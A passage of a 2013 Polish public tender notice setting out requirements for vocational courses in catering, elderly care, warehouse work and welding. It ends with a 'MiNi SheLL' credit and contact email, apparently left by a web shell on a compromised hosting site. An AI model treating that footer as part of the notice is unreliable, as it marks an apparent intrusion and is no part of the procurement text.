-	wyposażenie firmy cateringowej, 
-	zajęcia warsztatowe z realizacji usługi cateringowej
c)	Moduł III - carving-rzeźbienie w owocach i warzywach:
-	narzędzia do carvingu: typy, rodzaje, sposoby używania i konserwacji,
-	podstawowe techniki stosowane przy przygotowywaniu dekoracji 
z warzyw i owoców,
-	sposoby zabezpieczania i pielęgnacji wyrzeźbionych prac,
-	zajęcia warsztatowe z rzeźbienia w warzywach i owocach.
d)	Moduł IV - obsługa kasy fiskalnej i terminalu płatniczego; obsługa klienta:
-	zajęcia warsztatowe z obsługi kasy fiskalnej i terminalu płatniczego,
-	kultura osobista i etyka zawodowa na stanowisku kucharza małej gastronomii, 
-	postępowanie w przypadku reklamacji i zażaleń,
-	zajęcia warsztatowe z prawidłowego nakrycia stołu i artystycznego składania serwetek papierowych, materiałowych, flizelinowych,
e)	Moduł V - zajęcia praktyczne.
Zakres tematyczny Modułu V musi obejmować zagadnienia Modułu I-IV.
f)	Moduł VI - elementy przedsiębiorczości:
-	identyfikowanie szans i zagrożeń związanych z prowadzeniem działalności gospodarczej na własny rachunek, 
-	biznesplan, 
-	źródła pozyskiwania kapitału na uruchomienie własnej firmy,
-	obowiązki wobec Zakładu Ubezpieczeń Społecznych, Urzędu Skarbowego, Państwowej Inspekcji Pracy, 
-	aktywne metody pozyskiwania zleceń,
-	marketing i reklama, konkurencyjność i profesjonalizm jako element usług cateringowych.

g)	Moduł VII - egzamin z Modułu I - IV i VI 
5.	Czas trwania Modułu V (zajęcia praktyczne ) musi wynosić min. 40% całkowitej liczby godzin przypadających na realizację szkolenia.
6.	Na ocenę końcową szkolenia składają się wyniki egzaminu  (Moduł VII) oraz ocena z zajęć praktycznych (Moduł V).
7.	Wykonawca zapewni materiały dydaktyczne w postaci książek - zgodnych z tematyką szkolenia dla modułu I, II, III, IV, VI- kwota za jedną  pozycję książkową  wynosi ok. 15,00 zł- co w sumie daje nam kwotę ok.  75,00 zł. na uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs Opiekun osoby starszej i niepełnosprawnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szkolenie przeznaczone jest dla 2 osób ( +/-1 osoby) osób.
2.	Celem szkolenia jest przygotowanie uczestników do podjęcia pracy w charakterze opiekuna osób starszych i niepełnosprawnych. 
3.	Organizacja szkolenia:
1)	Szkolenie musi zostać przeprowadzone dla 2 osób ( +/-1 osoby ) w jednej grupie, z zastrzeżeniem, że Wykonawca zobowiązany będzie do uruchomienia szkolenia przy skierowaniu przez Zamawiającego co najmniej 1  osoby  w grupie.
2)	Zajęcia muszą odbywać się codziennie, z wyjątkiem sobót i niedziel oraz dni ustawowo wolnych od pracy; czas trwania szkolenia w ciągu jednego dnia nie może przekraczać 6 godzin zegarowych. Harmonogram musi zakładać taką samą liczbę godzin zajęć dziennie dla każdego uczestnika szkolenia.
3)	Przez godzinę zegarową kursu Zamawiający rozumie 60 minut zegarowych obejmujące zajęcia edukacyjne w wymiarze 45 minut oraz 15 minutową przerwę; Zamawiający nie dopuszcza kumulowania przerw w szczególności na zakończenie dnia zajęć. 
4)	Łączny czas szkolenia wynosi 80 godzin zegarowych, co stanowi, że szkolenie musi trwać ok. 16 dni.
5)	Szkolenie musi się odbywać się w:  Polkowice/ Lubin lub  Głogów
6)	Zajęcia przewidziane w Module II dla całej grupy muszą się odbywać w jednej instytucji świadczącej pomoc dla osób starszych i niepełnosprawnych.
7)	Wykonawca dla celów realizacji szkolenia Modułu I i III zobowiązany jest zapewnić odpowiednio wyposażoną salę dydaktyczną, adekwatną dla grupy dwuosobowej, z osobnymi miejscami dla każdego uczestnika szkolenia z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP.
8)	Zamawiający wymaga, aby w trakcie realizacji praktycznej części szkolenia (Modułu II) na skierowaną grupę  przypadało jednocześnie min. 1  opiekun zajęć praktycznych.
9)	Wykonawca zobowiąże opiekunów do prowadzenia Indywidualnej karty praktyk zawodowych każdego uczestnika szkolenia.
10)	Wykonawca zobowiązany jest do uruchomienia szkolenia w terminie wyznaczonym przez Zamawiającego.
11)	Termin zakończenia realizacji całości zamówienia: 31 października 2013 roku.
4.	 Program szkolenia
1)	Szkolenie musi odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie ok. 25 godzin zegarowych w tygodniu.
2)	Program szkolenia musi zawierać: 
a)	nazwę i zakres szkolenia, 
b)	czas trwania i sposób organizacji szkolenia, 
c)	wymagania wstępne dla uczestników szkolenia, 
d)	cele szkolenia, 
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, 
f)	opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
h)	przewidziane sprawdziany i egzaminy,
5.	Wykonawca musi wykorzystać standardy kwalifikacji zawodowych 
i modułowych programów szkoleń zawodowych, dostępnych w bazach danych, 
o których mowa w § 74 ust. 1 pkt 2 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 roku w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r. Nr 177, poz. 1193 z późn. zm.)- udowadniając odpowiednim oświadczeniem. 
6.	Zakres tematyczny szkolenia musi składać się z następujących po sobie modułów:

Moduł I - zajęcia teoretyczno-zawodowe (24 godziny zegarowe)
-	problemy zdrowotne, psychologiczne i społeczne ludzi starszych 
i niepełnosprawnych, 
-	profilaktyka i rehabilitacja osób chorych i niepełnosprawnych,
-	opieka nad człowiekiem starszym, przewlekle chorym 
i niepełnosprawnym,
-	pierwsza pomoc przedmedyczna,
-	rodzaje sprzętu ortopedycznego i rehabilitacyjnego,
-	kultura osobista i etyka zawodowa opiekuna osób starszych 
i niepełnosprawnych,
-	reprezentowanie/rozwiązywanie problemów dotyczących spraw administracyjno-prawnych podopiecznych,
-	organizacja czasu wolnego podopiecznych w tym rozpoznawanie potrzeb podopiecznego, stymulowanie do aktywnego spędzania wolnego czasu, rozwijanie zainteresowań,
Moduł II - zajęcia praktyczne pod nadzorem opiekunów (54 godziny zegarowe)
Zamawiający oczekuje, że po zakończonym szkoleniu uczestnicy będą potrafili: 
	otoczyć fachową opieką osobę starszą lub niepełnosprawną,
	realizować zadania zlecone przez lekarza np. rehabilitacja, podawanie leków, zasady żywienia,
	udzielić pierwszej pomocy w sytuacji zagrożenia życia lub czasowej niedyspozycji.
Moduł III - egzamin z Modułu I  (2 godziny zegarowe)
Na ocenę końcową szkolenia składają się wyniki egzaminu oraz ocena z zajęć praktycznych.
7.  Wykonawca zapewni materiały dydaktyczne w postaci książek - zgodnych z tematyką szkolenia dla modułu I, - kwota za jedną  pozycję książkową  wynosi ok. 15,00 zł na uczestnika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs Pracownik hurtowni  i magazynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szkolenie przeznaczone jest dla 4 osób (+/- 2 osoby) 
2.	Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników szkolenia do podjęcia pracy na stanowisku pracownika hurtowni i magazynu.
3.	Organizacja szkolenia:
1)	Szkolenie musi zostać przeprowadzone dla 4 osób w jednej grupie, z zastrzeżeniem, że Wykonawca zobowiązany będzie do uruchomienia szkolenia przy skierowaniu przez Zamawiającego co najmniej 2 osób w grupie.
2)	Zajęcia muszą odbywać się codziennie, z wyjątkiem sobót i niedziel oraz dni ustawowo wolnych od pracy. Czas trwania szkolenia w ciągu jednego dnia nie może przekraczać 6 godzin zegarowych. Harmonogram musi zakładać taką samą liczbę godzin zajęć dziennie dla każdego uczestnika szkolenia.
3)	Przez godzinę zegarową kursu Zamawiający rozumie 60 minut zegarowych obejmujące zajęcia edukacyjne w wymiarze 45 minut oraz 15 minutową przerwę; Zamawiający nie dopuszcza kumulowania przerw w szczególności na zakończenie dnia zajęć. 
4)	Łączny czas szkolenia wynosi 100 godzin zegarowych, co stanowi, że szkolenie musi trwać 20 dni.
5)	Szkolenie musi się odbywać się w  Polkowice/ Lubin lub Głogowa
6)	Wykaz hurtowni/magazynów dla zajęć Modułu IV Wykonawca przedstawi Zamawiającemu najpóźniej przed upływem piątego dnia trwania Modułu I szkolenia.
7)	Wykonawca dla celów realizacji szkolenia zobowiązany jest zapewnić odpowiednio wyposażoną salę dydaktyczną, adekwatną dla grupy czteroosobowej , z osobnymi miejscami dla każdego uczestnika szkolenia z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP.
8)	Wykonawca do realizacji szkolenia musi dysponować co najmniej 2 rodzajami wózków, w tym jezdniowym wózkiem podnośnikowym z napędem akumulatorowym lub spalinowym oraz wózkiem jezdniowym podnośnikowym zasilanym paliwem gazowym; Wykonawca musi również dysponować placem manewrowym do zajęć praktycznych.
9)	Wykonawca dla celów realizacji szkolenia w Module II musi zapewnić każdemu uczestnikowi szkolenia dostęp do komputera z licencjonowanym programem fakturowo-magazynowym na bieżąco aktualizowanym i zgodnym z obowiązującymi przepisami prawnymi.
10)	Wykonawca dla celów realizacji szkolenia w Module III musi dysponować 
4 kasami fiskalnymi, z czego min. 2 - różnej marki/producenta oraz czytnikiem kodów kreskowych i czytnikiem kart płatniczych.
11)	Moduł IV musi być realizowany w hurtowniach lub magazynach, pod nadzorem opiekunów, z zastrzeżeniem, że w jednej hurtowni czy magazynie zajęcia praktyczne będą odbywały grupy uczestników liczące po 2-4 osoby i w tym przypadku Zamawiający wymaga 1 opiekuna w każdej hurtowni/magazynier z zastrzeżeniem pkt. 12.
12)	Zamawiający dopuszcza, aby realizacja Modułu IV szkolenia odbywała się w 1 hurtowni/magazynie dla wszystkich uczestników szkolenia, pod nadzorem min. 1. opiekunów praktyk.
13)	Wykonawca zobowiąże opiekunów Modułu IV do prowadzenia Indywidualnej karty praktyk zawodowych każdego uczestnika szkolenia.
14)	Moduł IV musi obejmować zagadnienia Modułu I, II, III.
15)	Wykonawca zobowiązany jest do uruchomienia szkolenia w terminie wyznaczonym przez Zamawiającego.
16)	Termin zakończenia realizacji całości zamówienia: 31 października 2013 roku.
4.	Program szkolenia
1)	Szkolenie musi odbywać się w formie kursu realizowanego według planu nauczania obejmującego ok. 25 godzin zegarowych w tygodniu.
2)	Program szkolenia musi zawierać: 
a)	nazwę i zakres szkolenia, 
b)	czas trwania i sposób organizacji szkolenia, 
c)	wymagania wstępne dla uczestników szkolenia, 
d)	cele szkolenia, 
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, 
f)	opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
h)	przewidziane sprawdziany i egzaminy,
3)	Wykonawca musi wykorzystać standardy kwalifikacji zawodowych 
i modułowych programów szkoleń zawodowych, dostępnych w bazach danych, 
o których mowa w § 74 ust. 1 pkt 2 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 roku w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r. Nr 177, poz. 1193 z późn. zm.)- udowadniając odpowiedni oświadczeniem. 
4)	Zakres tematyczny szkolenia musi składać się z następujących po sobie modułów:
Moduł I - zajęcia teoretyczno-zawodowe (7 godzin zegarowych), zawierający co najmniej zagadnienia:
-	bezpieczeństwo i higiena pracy w jednostkach hurtowo-magazynowych, przy transporcie ręcznym i mechanicznym, ochrona przeciwpożarowa
-	dokumentacja organizacji magazynu i hurtowni
-	zasady właściwego przechowywania towarów
-	przyjmowanie i wydawanie towarów
-	inwentaryzacja
Moduł II - obsługa programów komputerowych wykorzystywanych w hurtowni i magazynie  (25 godzin zegarowych)
Moduł III - obsługa kasy fiskalnej i terminalu płatniczego (5 godzin zegarowych)
Moduł IV - zajęcia praktyk zawodowych (20 godziny zegarowe)
 Moduł V -  obsługa wózka jezdniowego wraz z wymianą butli gazowych (40 godzin zegarowych) 
-	podział stosowanych wózków
-	budowa wózków
-	czynności operatora przed rozpoczęciem, w trakcie oraz po zakończeniu pracy
-	wiadomości z zakresu BHP
-	wiadomości o dozorze technicznym
-	bezpieczne użytkowanie butli, w tym ich bezpieczna wymiana
-	praktyczna nauka jazdy wózkiem jezdniowym, w tym wymiana butli   gazowych
Moduł VI - egzaminy (3 godziny zegarowe)
-	z Modułu: I, II, III  
z Modułu: V (egzamin przed Komisją UDT)
5.	Wykonawca zapewni materiały dydaktyczne w postaci książek - zgodnych z tematyką szkolenia dla modułu I, II, III, V- kwota za jedną  pozycję książkową  wynosi ok. 15,00 zł- co w sumie daje nam kwotę ok.  60,00 zł. na uczestnika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs Kurs spawania rur i blach elektrodą otuloną- spoiny pachwinowe  wraz z Kursem gazowego spawania blach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szkolenie musi zostać przeprowadzone dla 5  osób (-/+2 osoby)  w jednej grupie, z zastrzeżeniem, że Wykonawca zobowiązany będzie do uruchomienia szkolenia przy skierowaniu przez Zamawiającego co najmniej 3 osób w grupie.
1)Zajęcia muszą odbywać się codziennie, z wyjątkiem sobót i niedziel oraz dni ustawowo wolnych od pracy; czas trwania szkolenia w ciągu jednego dnia nie może przekraczać 6 godzin zegarowych. Harmonogram musi zakładać taką samą liczbę godzin zajęć dziennie dla każdego uczestnika szkolenia.
2)Przez godzinę zegarową kursu Zamawiający rozumie 60 minut zegarowych obejmujące zajęcia edukacyjne w wymiarze 45 minut oraz 15 minutową przerwę; Zamawiający nie dopuszcza kumulowania przerw w szczególności na zakończenie dnia zajęć. 
3)Łączny czas szkolenia wynosi : 
a)Spawacz gazowy 127 godz.
b)Spawacz elektryczny 163 godz. 
c)Łącznie 290 godzin zegarowych, co stanowi, że szkolenie musi trwać ok.  49 dni. przy 6 godz. dziennie
2.Szkolenie musi się odbywać się w  Polkowice, Lubin lub  Głogów 
3.Wykonawca dla celów realizacji szkolenia zobowiązany jest zapewnić:
a)Odpowiednio wyposażoną salę dydaktyczną, adekwatną dla grupy pięcioosobowej,  z osobnymi miejscami dla każdego uczestnika szkolenia z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP - dla części teoretycznej szkolenia.
b)pracownię do zajęć praktycznych oraz odzież ochronną dla każdego uczestnika szkolenia 
4.Wykaz miejsc, w których będą przeprowadzone zajęcia praktyczne oraz wykaz opiekunów zajęć praktycznych (instruktorów) Wykonawca przedstawi Zamawiającemu najpóźniej przed upływem piątego dnia trwania szkolenia. Przy wyborze miejsc odbywania zajęć praktycznych Wykonawca, 
w miarę możliwości, uwzględni miejsce zamieszkania osoby skierowanej.
5.Wykonawca zobowiąże opiekunów zajęć praktycznych (instruktorów) do prowadzenia Indywidualnej Karty Zajęć Praktycznych każdego uczestnika szkolenia.
6.Wykonawca zobowiązany jest do uruchomienia szkolenia w terminie    wyznaczonym przez Zamawiającego.
7.Termin zakończenia realizacji całości zamówienia:  19.11.13 roku.
8.Program szkolenia
1)Szkolenie musi odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie do. 30 godzin zegarowych 
w tygodniu.
2)Program szkolenia musi zawierać: 
a.nazwę i zakres szkolenia, 
b.czas trwania i sposób organizacji szkolenia, 
c.wymagania wstępne dla uczestników szkolenia, 
d.cele szkolenia, 
e.plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, 
f.opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g.wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
h.przewidziane sprawdziany i egzaminy,
9.Wykonawca musi wykorzystać standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych, dostępnych w bazach danych, o których mowa w § 74 ust. 1 pkt 2 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 roku w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r. Nr 177, poz. 1193 z późn. zm.)- udowadniając odpowiednim oświadczeniem. 
10.Organizacja szkolenia:
1)Zakres tematyczny szkolenia musi składać się z następujących modułów:
Moduł I  Kurs gazowego spawania blach
a)bezpieczeństwo i higiena pracy,
b)bezpieczna praca na hali produkcyjnej,
c)materiały dodatkowe do spawania 
d)spawanie w praktyce,
e)oznaczenie i wymiarowanie spoin,
f)metody przygotowania złączy do spawania,
g)kwalifikowanie spawaczy,
h)wprowadzenie do zagadnień wytwarzania stali,
i)złącza spawane blach,
j)spawalność stali,
k)skurcz, naprężenia i odkształcenia,
l)niezgodności spawalnicze,
m)przegląd procesów spawania,
n)bezpieczna praca na montażu, 
o)kontrola i badania,
p)zapewnienie jakości w spawalnictwie,
q)budowa i użytkowanie urządzeń do spawania gazowego, typowe parametry,
r)zajęcia praktyczne.

Moduł II Kurs spawania rur i blach elektrodą otuloną- spoiny pachwinowe
a)zastosowanie elektryczności do spawania łukowego,
b)urządzenia spawalnicze
c)bezpieczeństwo i higiena pracy,
d)materiały dodatkowe do spawania,
e)spawanie w praktyce,
f)oznaczenie i wymiarowanie spoin,
g)metody przygotowania złączy do spawania,
h)kwalifikowanie spawaczy,
i)budowa i użytkowanie urządzeń do spawania elektrodami otulonymi i typowe parametry,
j)elektrody otulone,
k)zajęcia praktyczne.

UWAGA! Moduł  I i II  do przeprowadzenia przez jednego wykonawcę.

11.  Wykonawca zapewni materiały dydaktyczne w postaci książek - zgodnych z tematyką szkolenia dla modułu I, II - kwota za jedną  pozycję książkową  wynosi ok. 15,00 zł- co w sumie daje nam kwotę ok.  30,00 zł. na uczestnika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com